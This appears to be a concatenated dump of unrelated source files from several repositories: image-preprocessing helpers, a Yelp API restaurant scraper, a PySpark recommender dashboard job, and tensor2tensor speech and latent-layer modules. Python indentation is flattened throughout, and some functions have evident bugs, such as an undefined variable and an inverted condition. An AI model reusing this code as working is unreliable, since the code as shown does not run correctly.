# Brief Visualizations
#======================================================================
def view_freq(categories, training_dataset_path):
"""
Create a bar graph for visualizing categorical frequencies
:param categories: list of categories
:type categories: list
:param training_dataset_path: relative path of the training dataset
:type training_dataset_path: str
"""
n_imgs = []
for cat in categories:
files = os.listdir(os.path.join(training_dataset_path, cat))
n_imgs += [len(files)]
plt.bar([_ for _ in range(len(categories))], n_imgs, tick_label=categories)
plt.title("Category Frequencies")
plt.show()
def view_images(categories, training_dataset_path):
"""
View one image from each category
:param categories: list of categories
:type categories: list
:param training_dataset_path: relative path of the training dataset
:type training_dataset_path: str
"""
n_categories = len (categories)
fig, axes = plt.subplots(nrows=1, ncols=n_categories, figsize=(15, 3))
cat_cpt=0
for cat in categories:
category_path = os.path.join(training_dataset_path, cat)
img_name = os.listdir(category_path)[1]
img = skimage.io.imread(os.path.join(category_path, img_name))
img = skimage.transform.resize(img, (width, height, n_channels), mode='reflect')
axes[cat_cpt].imshow(img, resample=True)
axes[cat_cpt].set_title(cat, fontsize=8)
cat_cpt += 1
plt.show()
#======================================================================
# File Preprocessing
#======================================================================
def get_file_names(categories, training_dataset_path, test_dataset_path):
"""
Get all the file names and its category
:param categories: list of categories
:type categories: list
:param training_dataset_path: relative path of the training dataset
:type training_dataset_path: str
:param test_dataset_path: relative path of the test dataset
:type test_dataset_path: str
:returns: (list of tuples of train, where first element of tuple is file name,
and second element is the category, list of tuples of test)
:rtype: (list, list)
"""
training_data = []
for cat in categories:
files = os.listdir(os.path.join(training_dataset_path, cat))
for file in files:
training_data.append((os.path.join(cat, file), cat))
test_data = []
for cat in categories:
files = os.listdir(os.path.join(test_dataset_path, cat))
for file in files:
test_data.append((os.path.join(cat, file), cat))
return training_data, test_data
def move_bad_file(tuples_list, dataset_path, corrupt_path):
"""
Move corrupted images to new folder.
:param tuples_list: list of tuples,
where first element of tuple is file name,
and second element is the category,
:type tuples_list: list
:param dataset_path: relative path of the dataset
:type dataset_path: str
:param corrupt_path: relative path where corrupted files are moved
:type corrupt_path: str
"""
indexes = np.arange(len(tuples_list))
n_samples = len(indexes)
for i in range(n_samples):
t = tuples_list[indexes[i]]
path_name = os.path.join(dataset_path, t[0])
try:
img = Image.open(path_name)
except FileNotFoundError:
# corrupt file has already been moved
pass
except (IOError, SyntaxError) as e:
print("Bad file:", t[0])
# move file
os.rename(path_name, os.path.join(corrupt_path, t[0]))
```
#### File: Scraping/API/restaurant_scrape.py
```python
from __future__ import print_function
import json
import re
import requests
import sys
import urllib3
import signal
import MySQLdb
import logging
import pprint
#from urllib3 import HTTPError
from urllib.parse import quote
#from urllib import urlencode
API_KEY = 'FILL'
# API constants, you shouldn't have to change these.
API_HOST = 'https://api.yelp.com'
SEARCH_PATH = '/v3/businesses/search'
SEARCH_PATH_BEST = '/v3/business/matches/best'
BUSINESS_PATH = '/v3/businesses/' # Business ID will come after slash.
DEFAULT_TERM = 'dinner'
DEFAULT_LOCATION = 'San Francisco, CA'
SEARCH_LIMIT = 1
DBHOST = 'localhost'
DBUSER = 'restaurants'
DBPASS = ''
DB = 'restaurants'
LOGFILE = 'restaurants_chi.log'
rcount = 0
list_left = 0
logging.basicConfig(format='%(asctime)s %(message)s',
datefmt='%m/%d/%Y %I:%M:%S %p',
filename=LOGFILE,
level=logging.INFO)
def signal_handler(signal, frame):
print('Ouch!')
logging.info('*** killed process. completed %s entries.', rcount)
sys.exit(0)
signal.signal(signal.SIGINT, signal_handler)
'''
def get_list():
global DBHOST, DBUSER, DBPASS, DB
print("Getting list from database")
data = []
Error = ""
try:
db = MySQLdb.connect(host=DBHOST,
user=DBUSER,
passwd=DBPASS,
db=DB,
use_unicode=True,
charset="utf8")
cursor = db.cursor()
cursor.execute('SELECT DISTINCT DBA_Name, AKA_Name, Address
AS Latest_Insp FROM food_inspection_chi
WHERE Results != 'Out of Business'
AND Facility_Type = "Restaurant"
AND Inspection_Date >= '2016-01-01'
GROUP BY Address;')
row = cursor.fetchone()
while row is not None:
data.append(row)
row = cursor.fetchone()
except Error as e:
print(e)
finally:
cursor.close()
db.close()
return data
'''
def request(host, path, api_key, url_params=None):
"""Given your API_KEY, send a GET request to the API.
Args:
host (str): The domain host of the API.
path (str): The path of the API after the domain.
API_KEY (str): Your API Key.
url_params (dict): An optional set of query parameters in the request.
Returns:
dict: The JSON response from the request.
Raises:
HTTPError: An error occurs from the HTTP request.
"""
url_params = url_params or {}
url = '{0}{1}'.format(host, quote(path.encode('utf8')))
headers = {
'Authorization': 'Bearer %s' % api_key,
}
# print(u'Querying {0} ...'.format(url))
response = requests.request('GET', url, headers=headers, params=url_params)
return response.json()
def business_lookup(api_key, term, address):
global rcount
url_params = {
'name': name.replace(' ', '+'),
'location': address,
'city': "Chicago",
'state': "IL",
'country': "US",
}
return request(API_HOST, SEARCH_PATH_BEST, api_key, url_params=url_params)
def search(api_key, term, address):
global rcount
# term = re.sub('(?:\s\W | LLC| INC|, LLC)', ' ', term.rstrip())
term = re.sub('(?:\s\W |#|\.|,|\d| RESTAURANT|CAFE|TAQUERIA| LLC| INC|, LLC|\([^)]*\))', ' ', term.rstrip())
url_params = {
'term': term.replace(' ', '+'),
'location': address,
'radius': "50",
'limit': SEARCH_LIMIT
}
results = request(API_HOST, SEARCH_PATH, api_key, url_params=url_params)
# print(results)
# print(url_params)
try:
if results['total'] is 0:
print('\033[91m not found\n\033[0m')
logging.info('not found %s %s', term, address)
except:
print('whatevs')
try:
for value in results['businesses']:
try:
business_id = results['businesses'][0]['id']
except:
continue
business_name = results['businesses'][0]['name']
is_closed = results['businesses'][0]['is_closed']
if is_closed:
is_closed = "true"
else:
is_closed = "false"
review_count = results['businesses'][0]['review_count']
business_address1 = results['businesses'][0]['location']['address1']
business_city = results['businesses'][0]['location']['city']
business_state = results['businesses'][0]['location']['state']
business_country = results['businesses'][0]['location']['country']
business_zip = results['businesses'][0]['location']['zip_code']
try:
business_price = str(len(results['businesses'][0]['price']))
except KeyError:
business_price = "NA"
business_rating = str(results['businesses'][0]['rating'])
business_categories = []
business_category0 = "NA"
business_category1 = "NA"
business_category2 = "NA"
for category in results['businesses'][0]['categories']:
business_categories.append(category['alias'])
if len(business_categories) == 3:
business_category0, business_category1, business_category2 = business_categories
elif len(business_categories) == 2:
business_category0, business_category1 = business_categories
business_category2 = "NA"
elif len(business_categories) == 1:
business_category0 = business_categories[0]
business_category1 = "NA"
business_category2 = "NA"
elif len(business_categories) == 0:
business_category0 = "NA"
business_category1 = "NA"
business_category2 = "NA"
business_lat = results['businesses'][0]['coordinates']['latitude']
business_lon = results['businesses'][0]['coordinates']['longitude']
rcount = rcount + 1
print('\033[0m', " adding:", '\033[92m', business_name, b'\033[93m', business_address1, '\033[0m', "\n")
logging.info('added %s %s', business_name, business_address1)
update_db(business_id, business_name, review_count,
business_address1, business_city, business_state,
business_country, business_zip, business_price,
business_rating, business_category0, business_category1,
business_category2, business_lat, business_lon, is_closed)
except:
print('business error')
def get_business(api_key, business_id):
"""Query the Business API by a business ID.
Args:
business_id (str): The ID of the business to query.
Returns:
dict: The JSON response from the request.
"""
business_path = BUSINESS_PATH + business_id
return request(API_HOST, business_path, api_key)
'''
def update_db(business_id, business_name, review_count, business_address1,
business_city, business_state, business_country, business_zip,
business_price, business_rating, business_category0,
business_category1, business_category2, business_lat, business_lon, is_closed):
global DBHOST, DBUSER, DBPASS, DB
db = MySQLdb.connect(host=DBHOST,
user=DBUSER,
passwd=DBPASS,
db=DB,
use_unicode=True,
charset="utf8")
cursor = db.cursor()
cursor.execute('INSERT into restaurants_chi (id, name, review_count, address, city,
state, country, zip, price, rating, category0, category1,
category2, latitude, longitude, is_closed) VALUES (%s, %s, %s, %s, %s,
%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s) ON DUPLICATE
KEY UPDATE id = VALUES(id), rating = VALUES(rating),
latitude = VALUES(latitude), longitude = VALUES(longitude)
', (business_id, business_name, review_count, business_address1,
business_city, business_state, business_country,
business_zip, business_price, business_rating,
business_category0, business_category1,
business_category2, business_lat, business_lon, is_closed))
db.commit()
db.close()
'''
def main():
global list_left
logging.info('*** starting new run.')
#inspection_list = get_list()
#list_left = len(inspection_list)
logging.info('loaded %s entries from food_inspection_chi db', list_left)
inspection_list = [["MCDONALD'S", "41.720224099058896", "-87.6433279836791"]]
list_left = len(inspection_list)
for dbname, akaname, address, in inspection_list:
if akaname:
if len(address) >= 3:
print('\033[0m', 'searching AKA_name:', '\033[92m', akaname, '\033[93m', address, '\033[0m', list_left, 'remaining')
logging.info('searching AKA_Name: %s %s', dbname, address)
search(API_KEY, akaname, address)
list_left = list_left - 1
else:
if len(address) >= 3:
print('\033[0m', 'searching DBA_Name:', '\033[92m', dbname, '\033[93m', address, '\033[0m', list_left, 'remaining')
logging.info('searching DBA_Name: %s %s', dbname, address)
search(API_KEY, dbname, address)
list_left = list_left - 1
# print(dbname, latitude, longitude)
logging.info('*** finished. completed %s entries', rcount)
if __name__ == '__main__':
main()
``` |
{
"source": "JinLi97/recommender-system-dev-workshop-code",
"score": 3
} |
#### File: movie/dashboard/process.py
```python
import argparse
import json
import time
import boto3
from pyspark.sql import SparkSession
from pyspark.sql.functions import col, size, window, instr, lower
def list_s3_by_prefix(bucket, prefix, filter_func=None):
print(f"list_s3_by_prefix bucket: {bucket}, prefix: {prefix}")
s3_bucket = boto3.resource('s3').Bucket(bucket)
if filter_func is None:
key_list = [s.key for s in s3_bucket.objects.filter(Prefix=prefix)]
else:
key_list = [s.key for s in s3_bucket.objects.filter(
Prefix=prefix) if filter_func(s.key)]
print("list_s3_by_prefix return:", key_list)
return key_list
def s3_copy(bucket, from_key, to_key):
s3_bucket = boto3.resource('s3').Bucket(bucket)
copy_source = {
'Bucket': bucket,
'Key': from_key
}
s3_bucket.copy(copy_source, to_key)
print("copied s3://{}/{} to s3://{}/{}".format(bucket, from_key, bucket, to_key))
def s3_upload(file, bucket, s3_key):
s3_bucket = boto3.resource('s3').Bucket(bucket)
s3_bucket.Object(s3_key).upload_file(file)
print("uploaded file {} to s3://{}/{}".format(file, bucket, s3_key))
parser = argparse.ArgumentParser(description="app inputs and outputs")
parser.add_argument("--bucket", type=str, help="s3 bucket")
parser.add_argument("--prefix", type=str,
help="s3 input key prefix")
parser.add_argument("--region", type=str, help="aws region")
args, _ = parser.parse_known_args()
print("args:", args)
if args.region:
print("region:", args.region)
boto3.setup_default_session(region_name=args.region)
bucket = args.bucket
prefix = args.prefix
if prefix.endswith("/"):
prefix = prefix[:-1]
print(f"bucket:{bucket}, prefix:{prefix}")
# input_prefix=recommender-system-news-open-toutiao/system/item-data/raw-input/
# output_prefix=recommender-system-news-open-toutiao/system/item-data/emr-out/
item_input_file = "s3://{}/{}/system/ingest-data/item/".format(bucket, prefix)
action_input_file = "s3://{}/{}/system/ingest-data/action/".format(bucket, prefix)
user_input_file = "s3://{}/{}/system/ingest-data/user/".format(bucket, prefix)
output_file_key = "{}/system/dashboard/dashboard.json".format(prefix)
print("item_input_file:", item_input_file)
print("action_input_file:", action_input_file)
print("user_input_file:", user_input_file)
# item_input_file = '/Users/yonmzn/tmp/item/'
# action_input_file = '/Users/yonmzn/tmp/action/'
# user_input_file = '/Users/yonmzn/tmp/user/'
statistics_dict = {}
WIN_SIZE = "60 minutes"
def item_statistics(df_item_input):
print("item_statistics enter")
global statistics_dict
total_item_count = df_item_input.select("item_id").dropDuplicates(["item_id"]).count()
statistics_dict["total_item_count"] = total_item_count
# is_new_count = df_item_input.selectExpr("id", "cast(is_new as int)").groupby("id").min("is_new").groupby(
# "min(is_new)").count().collect()
# for row in is_new_count:
# is_new, count = row['min(is_new)'], row['count']
# if is_new == 1:
# statistics_dict["new_item_count"] = count
# break
print("item_statistics done")
def user_statistics(df_user_input):
print("user_statistics enter")
global statistics_dict
total_user_count = df_user_input.count()
anonymous_user_count = df_user_input.where(
(col('user_name') == '') | (instr(lower(col('user_name')), "anonymous") >= 1)).count()
register_user_count = total_user_count - anonymous_user_count
statistics_dict['total_user_count'] = total_user_count
statistics_dict['register_user_count'] = register_user_count
statistics_dict['anonymous_user_count'] = anonymous_user_count
print("user_statistics done")
def action_statistics(df_action_input, df_item_input, df_user_input):
print("action_statistics enter")
global statistics_dict
df_item = df_item_input.select(col("item_id"),
col("category_property"),
col("title")).dropDuplicates(["item_id"])
df_item.cache()
if statistics_dict.get("total_item_count"):
total_item_count = df_item.count()
else:
total_item_count = statistics_dict["total_item_count"]
df_user = df_user_input.select("user_id", "user_name")
df_user.cache()
#recommender_count = df_action_input.where(col('click_source') == '1').count()
#recommender_click_count = df_action_input.where((col('click_source') == '1') & (col("action_value") == '1')).count()
#statistics_dict['recommender_click_cover_ratio'] = int((recommender_click_count / recommender_count) * 100) / 100
df_clicked_action_event = df_action_input.where(col("action_value") == '1')
# total_click_item_count = df_clicked_action_event.select('item_id').dropDuplicates(['item_id']).count()
item_in_action_count = df_action_input.select(col('item_id')).distinct().count()
statistics_dict['recommender_click_cover_ratio'] = int((item_in_action_count / total_item_count) * 100) / 100
click_item_in_action_count = df_action_input.where(col("action_value") == '1').select(col('item_id')).distinct().count()
statistics_dict['item_click_ratio'] = int((click_item_in_action_count / item_in_action_count) * 100) / 100
total_click_count = df_clicked_action_event.count()
statistics_dict['total_click_count'] = total_click_count
print("total_click_count: ", total_click_count)
print("begin finding top_users ...")
df_action_event = df_clicked_action_event. \
withColumn("timestamp_bigint", col('timestamp').cast('bigint')). \
withColumn("event_time", col('timestamp_bigint').cast('timestamp')). \
drop(col('timestamp_bigint')). \
drop(col('action_type')). \
drop(col('action_value')). \
drop(col('timestamp'))
join_type = "inner"
df_action_event_full = df_action_event.join(df_item, ['item_id'], join_type) \
.join(df_user, ['user_id'], join_type)
# df_action_hour = df_action_event_full.withColumn('date', col('event_time').cast("date")).withColumn('hour', hour(col('event_time')))
df_action_user_window = df_action_event_full.groupBy(window(col('event_time'), WIN_SIZE), col('user_id'),
col('user_name')).count()
df_action_user_window_sort = df_action_user_window.orderBy([col('window').desc(), col('count').desc()])
user_rows = df_action_user_window_sort.select(col("user_id"), col("user_name"), col('count')).take(100)
top_10_user_ids = []
top_10_user = []
for user in user_rows:
user_id = user['user_id']
user_name = user['user_name']
count = user['count']
if user_id not in top_10_user_ids:
top_10_user_ids.append(user_id)
top_10_user.append({
'user_id': user_id,
"name": user_name,
"count": int(count)
})
if len(top_10_user_ids) >= 10:
break
statistics_dict['top_users'] = top_10_user
print("begin finding top_items ...")
df_action_item_window = df_action_event_full.groupBy(window(col('event_time'), WIN_SIZE), col('item_id'),
col('title')).count()
df_action_item_window_sort = df_action_item_window.orderBy([col('window').desc(), col('count').desc()])
item_rows = df_action_item_window_sort.select(col("item_id"), col("title"), col('count')).take(100)
top_10_item_ids = []
top_10_item = []
for item_row in item_rows:
item_id = item_row['item_id']
title = item_row['title']
count = item_row['count']
if item_id not in top_10_item_ids:
top_10_item_ids.append(item_id)
top_10_item.append({
"id": item_id,
"title": title,
"count": int(count)
})
if len(top_10_item_ids) >= 10:
break
statistics_dict['top_items'] = top_10_item
print("begin finding click_count_by_source ...")
click_count_by_source = []
action_source_total_rows = df_action_event_full.groupBy(col('click_source')).count().collect()
for row in action_source_total_rows:
click_count_by_source.append(
{
"source": 'recommend' if str(row['click_source']) == '1' else row['click_source'],
"count": row['count']
}
)
statistics_dict['click_count_by_source'] = click_count_by_source
print("begin finding click_count_by_source_time_window ...")
df_action_event_recommender = df_action_event_full.withColumn("is_recommender", col('click_source') == '1')
df_action_event_recommender_window = df_action_event_recommender \
.groupBy(window(col('event_time'), WIN_SIZE), col('is_recommender')).count()
n_hours = 8
start_time = \
df_action_event_recommender_window.select(col("window")['start']).orderBy([col('window.start').desc()]).take(
n_hours)[-1][
'window.start']
df_action_recommender_n_hours = df_action_event_recommender_window.where(
col("window")['start'] >= start_time).orderBy(
[col('window')])
recommender_n_hours = df_action_recommender_n_hours.collect()
clicked_by_recommender = []
for row in recommender_n_hours:
start_time = int(row['window']['start'].timestamp())
end_time = int(row['window']['end'].timestamp())
is_recommender = row['is_recommender']
count = row['count']
clicked_by_recommender.append({
"start_time": start_time,
"end_time": end_time,
"is_recommender": is_recommender,
"count": count
})
statistics_dict['click_count_recommender_time_window'] = clicked_by_recommender
with SparkSession.builder.appName("Spark App - item preprocessing").getOrCreate() as spark:
#
# item data
#
df_item_input = spark.read.text(item_input_file)
df_item_input = df_item_input.selectExpr("split(value, '_!_') as row").where(
size(col("row")) > 12).selectExpr("row[0] as item_id",
"row[1] as program_type",
"row[2] as title",
"row[3] as release_year",
"row[4] as director",
"row[5] as actor",
"row[6] as category_property",
"row[7] as language",
"row[8] as ticket_num",
"row[9] as popularity",
"row[10] as score",
"row[11] as level",
"row[12] as is_new"
)
df_item_input.cache()
print("df_item_input OK")
#
# action data
#
df_action_input = spark.read.text(action_input_file)
df_action_input = df_action_input.selectExpr("split(value, '_!_') as row").where(
size(col("row")) > 5).selectExpr("row[0] as user_id",
"row[1] as item_id",
"row[2] as timestamp",
"cast(row[3] as string) as action_type",
"row[4] as action_value",
"row[5] as click_source",
)
# df_action_input = df_action_input.withColumn("click_source", lit("1"))
df_action_input.cache()
print("df_action_input OK")
#
# user data
#
df_user_input = spark.read.text(user_input_file)
df_user_input = df_user_input.selectExpr("split(value, '_!_') as row").where(
size(col("row")) > 4).selectExpr("row[0] as user_id",
"row[4] as user_name",
).dropDuplicates(["user_id"])
print("df_user_input OK")
df_user_input.cache()
item_statistics(df_item_input)
action_statistics(df_action_input, df_item_input, df_user_input)
user_statistics(df_user_input)
statistics_dict["report_time"] = int(time.time())
print("statistics_dict:", statistics_dict)
file_name = "dashboard.json"
with open(file_name, 'w', encoding='utf8') as out:
json.dump(statistics_dict, out, indent=1, ensure_ascii=False)
s3_upload(file_name, bucket, output_file_key)
print("Done!")
``` |
{
"source": "jinliangwei/tensor2tensor",
"score": 2
} |
#### File: tensor2tensor/data_generators/common_voice.py
```python
import csv
import os
import tarfile
import tqdm # pylint: disable=g-bad-import-order
from tensor2tensor.data_generators import generator_utils
from tensor2tensor.data_generators import problem
from tensor2tensor.data_generators import speech_recognition
from tensor2tensor.utils import registry
import tensorflow as tf
_COMMONVOICE_URL = "https://common-voice-data-download.s3.amazonaws.com/cv_corpus_v1.tar.gz" # pylint: disable=line-too-long
_COMMONVOICE_TRAIN_DATASETS = ["cv-valid-train", "cv-other-train"]
_COMMONVOICE_DEV_DATASETS = ["cv-valid-dev", "cv-other-dev"]
_COMMONVOICE_TEST_DATASETS = ["cv-valid-test", "cv-other-test"]
def _collect_data(directory):
"""Traverses directory collecting input and target files.
Args:
directory: base path to extracted audio and transcripts.
Returns:
list of (media_base, media_filepath, label) tuples
"""
# Returns:
data_files = []
transcripts = [
filename for filename in os.listdir(directory)
if filename.endswith(".csv")
]
for transcript in transcripts:
transcript_path = os.path.join(directory, transcript)
with open(transcript_path, "r") as transcript_file:
transcript_reader = csv.reader(transcript_file)
# skip header
_ = next(transcript_reader)
for transcript_line in transcript_reader:
media_name, label = transcript_line[0:2]
filename = os.path.join(directory, media_name)
data_files.append((media_name, filename, label))
return data_files
def _file_exists(path, filename):
"""Checks if the filename exists under the path."""
return os.path.isfile(os.path.join(path, filename))
def _is_relative(path, filename):
"""Checks if the filename is relative, not absolute."""
return os.path.abspath(os.path.join(path, filename)).startswith(path)
@registry.register_problem()
class CommonVoice(speech_recognition.SpeechRecognitionProblem):
"""Problem spec for Commonvoice using clean and noisy data."""
# Select only the clean data
TRAIN_DATASETS = _COMMONVOICE_TRAIN_DATASETS[:1]
DEV_DATASETS = _COMMONVOICE_DEV_DATASETS[:1]
TEST_DATASETS = _COMMONVOICE_TEST_DATASETS[:1]
@property
def num_shards(self):
return 100
@property
def use_subword_tokenizer(self):
return False
@property
def num_dev_shards(self):
return 1
@property
def num_test_shards(self):
return 1
@property
def use_train_shards_for_dev(self):
"""If true, we only generate training data and hold out shards for dev."""
return False
def generator(self,
data_dir,
tmp_dir,
datasets,
eos_list=None,
start_from=0,
how_many=0):
del eos_list
i = 0
filename = os.path.basename(_COMMONVOICE_URL)
compressed_file = generator_utils.maybe_download(tmp_dir, filename,
_COMMONVOICE_URL)
read_type = "r:gz" if filename.endswith(".tgz") else "r"
with tarfile.open(compressed_file, read_type) as corpus_tar:
# Create a subset of files that don't already exist.
# tarfile.extractall errors when encountering an existing file
# and tarfile.extract is extremely slow. For security, check that all
# paths are relative.
members = [
f for f in corpus_tar if _is_relative(tmp_dir, f.name) and
not _file_exists(tmp_dir, f.name)
]
corpus_tar.extractall(tmp_dir, members=members)
data_dir = os.path.join(tmp_dir, "cv_corpus_v1")
data_tuples = _collect_data(data_dir)
encoders = self.feature_encoders(None)
audio_encoder = encoders["waveforms"]
text_encoder = encoders["targets"]
for dataset in datasets:
data_tuples = (tup for tup in data_tuples if tup[0].startswith(dataset))
for utt_id, media_file, text_data in tqdm.tqdm(
sorted(data_tuples)[start_from:]):
if how_many > 0 and i == how_many:
return
i += 1
wav_data = audio_encoder.encode(media_file)
yield {
"waveforms": wav_data,
"waveform_lens": [len(wav_data)],
"targets": text_encoder.encode(text_data),
"raw_transcript": [text_data],
"utt_id": [utt_id],
"spk_id": ["unknown"],
}
def generate_data(self, data_dir, tmp_dir, task_id=-1):
train_paths = self.training_filepaths(
data_dir, self.num_shards, shuffled=False)
dev_paths = self.dev_filepaths(
data_dir, self.num_dev_shards, shuffled=False)
test_paths = self.test_filepaths(
data_dir, self.num_test_shards, shuffled=True)
generator_utils.generate_files(
self.generator(data_dir, tmp_dir, self.TEST_DATASETS), test_paths)
if self.use_train_shards_for_dev:
all_paths = train_paths + dev_paths
generator_utils.generate_files(
self.generator(data_dir, tmp_dir, self.TRAIN_DATASETS), all_paths)
generator_utils.shuffle_dataset(all_paths)
else:
generator_utils.generate_dataset_and_shuffle(
self.generator(data_dir, tmp_dir, self.TRAIN_DATASETS), train_paths,
self.generator(data_dir, tmp_dir, self.DEV_DATASETS), dev_paths)
@registry.register_problem()
class CommonVoiceTrainFullTestClean(CommonVoice):
"""Problem to train on full set, but evaluate on clean data only."""
def training_filepaths(self, data_dir, num_shards, shuffled):
return CommonVoice.training_filepaths(self, data_dir, num_shards, shuffled)
def dev_filepaths(self, data_dir, num_shards, shuffled):
return CommonVoiceClean.dev_filepaths(self, data_dir, num_shards, shuffled)
def test_filepaths(self, data_dir, num_shards, shuffled):
return CommonVoiceClean.test_filepaths(self, data_dir, num_shards, shuffled)
def generate_data(self, data_dir, tmp_dir, task_id=-1):
raise Exception("Generate Commonvoice and Commonvoice_clean data.")
def filepattern(self, data_dir, mode, shard=None):
"""Get filepattern for data files for mode.
Matches mode to a suffix.
* DatasetSplit.TRAIN: train
* DatasetSplit.EVAL: dev
* DatasetSplit.TEST: test
* tf.estimator.ModeKeys.PREDICT: dev
Args:
data_dir: str, data directory.
mode: DatasetSplit
shard: int, if provided, will only read data from the specified shard.
Returns:
filepattern str
"""
shard_str = "-%05d" % shard if shard is not None else ""
if mode == problem.DatasetSplit.TRAIN:
path = os.path.join(data_dir, "common_voice")
suffix = "train"
elif mode in [problem.DatasetSplit.EVAL, tf.estimator.ModeKeys.PREDICT]:
path = os.path.join(data_dir, "common_voice_clean")
suffix = "dev"
else:
assert mode == problem.DatasetSplit.TEST
path = os.path.join(data_dir, "common_voice_clean")
suffix = "test"
return "%s-%s%s*" % (path, suffix, shard_str)
@registry.register_problem()
class CommonVoiceClean(CommonVoice):
"""Problem spec for Common Voice using clean train and clean eval data."""
# Select only the "clean" data (crowdsourced quality control).
TRAIN_DATASETS = _COMMONVOICE_TRAIN_DATASETS[:1]
DEV_DATASETS = _COMMONVOICE_DEV_DATASETS[:1]
TEST_DATASETS = _COMMONVOICE_TEST_DATASETS[:1]
@registry.register_problem()
class CommonVoiceNoisy(CommonVoice):
"""Problem spec for Common Voice using noisy train and noisy eval data."""
# Select only the "other" data.
TRAIN_DATASETS = _COMMONVOICE_TRAIN_DATASETS[1:]
DEV_DATASETS = _COMMONVOICE_DEV_DATASETS[1:]
TEST_DATASETS = _COMMONVOICE_TEST_DATASETS[1:]
def set_common_voice_length_hparams(hparams):
hparams.max_length = 1650 * 80
hparams.max_input_seq_length = 1650
hparams.max_target_seq_length = 350
return hparams
```
#### File: tensor2tensor/layers/latent_layers.py
```python
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from six.moves import range # pylint: disable=redefined-builtin
from tensor2tensor.layers import common_attention
from tensor2tensor.layers import common_image_attention as cia
from tensor2tensor.layers import common_layers
from tensor2tensor.models import transformer
from tensor2tensor.utils import beam_search
import tensorflow as tf
DO_SUMMARIES = True
def compress_self_attention_layer(x, hparams, name=None):
"""Attend function."""
with tf.variable_scope(name, default_name="compress_self_attention"):
x, xshape, _ = cia.maybe_reshape_4d_to_3d(x)
y = common_attention.multihead_attention(
common_layers.layer_preprocess(x, hparams),
None,
None,
hparams.attention_key_channels or hparams.hidden_size,
hparams.attention_value_channels or hparams.hidden_size,
hparams.hidden_size, hparams.num_heads,
hparams.attention_dropout)
res = common_layers.layer_postprocess(x, y, hparams)
return tf.reshape(res, xshape)
def compute_nats_and_bits_per_dim(data_dim,
latent_dim,
average_reconstruction,
average_prior):
"""Computes negative ELBO, which is an upper bound on the negative likelihood.
Args:
data_dim: int-like indicating data dimensionality.
latent_dim: int-like indicating latent dimensionality.
average_reconstruction: Scalar Tensor indicating the reconstruction cost
averaged over all data dimensions and any data batches.
average_prior: Scalar Tensor indicating the negative log-prior probability
averaged over all latent dimensions and any data batches.
Returns:
Tuple of scalar Tensors, representing the nats and bits per data dimension
(e.g., subpixels) respectively.
"""
with tf.name_scope(None, default_name="compute_nats_per_dim"):
data_dim = tf.cast(data_dim, average_reconstruction.dtype)
latent_dim = tf.cast(latent_dim, average_prior.dtype)
negative_log_likelihood = data_dim * average_reconstruction
negative_log_prior = latent_dim * average_prior
negative_elbo = negative_log_likelihood + negative_log_prior
nats_per_dim = tf.divide(negative_elbo, data_dim, name="nats_per_dim")
bits_per_dim = tf.divide(nats_per_dim, tf.log(2.), name="bits_per_dim")
return nats_per_dim, bits_per_dim
def multinomial_sample(x, vocab_size=None, sampling_method="random",
temperature=1.0):
"""Multinomial sampling from a n-dimensional tensor.
Args:
x: Tensor of shape [..., vocab_size]. Parameterizes logits of multinomial.
vocab_size: Number of classes in multinomial distribution.
sampling_method: String, "random" or otherwise deterministic.
temperature: Positive float.
Returns:
Tensor of shape [...].
"""
vocab_size = vocab_size or common_layers.shape_list(x)[-1]
if sampling_method == "random" and temperature > 0.0:
samples = tf.multinomial(tf.reshape(x, [-1, vocab_size]) / temperature, 1)
else:
samples = tf.argmax(x, axis=-1)
reshaped_samples = tf.reshape(samples, common_layers.shape_list(x)[:-1])
return reshaped_samples
def ae_latent_softmax(latents_pred, latents_discrete_hot, vocab_size, hparams):
"""Latent prediction and loss.
Args:
latents_pred: Tensor of shape [..., depth].
latents_discrete_hot: Tensor of shape [..., vocab_size].
vocab_size: an int representing the vocab size.
hparams: tf.contrib.training.HParams.
Returns:
sample: Tensor of shape [...], a sample from a multinomial distribution.
loss: Tensor of shape [...], the softmax cross-entropy.
"""
with tf.variable_scope("latent_logits"):
latents_logits = tf.layers.dense(latents_pred, vocab_size,
name="logits_dense")
if hparams.logit_normalization:
latents_logits *= tf.rsqrt(1e-8 +
tf.reduce_mean(tf.square(latents_logits)))
loss = tf.nn.softmax_cross_entropy_with_logits_v2(
labels=latents_discrete_hot, logits=latents_logits)
# TODO(trandustin): tease this out from ae_latent_softmax.
# we use just the loss portion to anchor prior / encoder on text.
sample = multinomial_sample(latents_logits,
vocab_size,
hparams.sampling_method,
hparams.sampling_temp)
return sample, loss
def ae_latent_sample_beam(latents_dense_in, inputs, ed, embed, hparams):
"""Samples from the latent space in the autoencoder.
Args:
latents_dense_in: Tensor of shape [batch, length_q, ...]. Only the shape of
its first two dimensions are used. length_q is the latent length, which is
height * width * hparams.num_latents / (2**hparams.num_compress_steps).
inputs: Tensor of shape [batch, length_kv, hparams.hidden_size]. Encodings
to attend to in decoder.
ed: Tensor which broadcasts with shape [batch, hparams.num_heads, length_q,
length_kv]. Encoder-decoder attention bias.
embed: Callable which embeds discrete latent hot-vectors and a hidden size
and returns dense vectors.
hparams: tf.contrib.training.HParams.
Returns:
Tensor of shape [batch, length].
"""
def symbols_to_logits_fn(ids):
"""Go from ids to logits."""
ids = tf.expand_dims(ids, axis=2) # Ids start with added all-zeros.
latents_discrete = tf.pad(ids[:, 1:], [[0, 0], [0, 1], [0, 0]])
with tf.variable_scope(tf.get_variable_scope(), reuse=False):
latents_dense = embed(
tf.one_hot(latents_discrete, depth=2**hparams.bottleneck_bits),
hparams.hidden_size)
latents_pred = transformer_latent_decoder(
latents_dense, inputs, ed, hparams, name="latent_prediction")
logits = tf.layers.dense(
latents_pred, 2**hparams.bottleneck_bits, name="logits_dense")
current_output_position = common_layers.shape_list(ids)[1] - 1
logits = logits[:, current_output_position, :]
return logits
initial_ids = tf.zeros([tf.shape(latents_dense_in)[0]], dtype=tf.int32)
length = tf.shape(latents_dense_in)[1]
ids, _ = beam_search.beam_search(
symbols_to_logits_fn,
initial_ids,
1,
length,
2**hparams.bottleneck_bits,
alpha=0.0,
eos_id=-1,
stop_early=False)
res = tf.expand_dims(ids[:, 0, :], axis=2) # Pick first beam.
return res[:, 1:] # Remove the added all-zeros from ids.
def residual_block_layer(inputs, hparams):
"""Residual block over inputs.
Runs a residual block consisting of
conv: kernel_size x kernel_size
conv: 1x1
dropout, add and normalize according to hparams.layer_postprocess_sequence.
Args:
inputs: Tensor of shape [batch, height, width, hparams.hidden_size].
hparams: tf.contrib.training.HParams.
Returns:
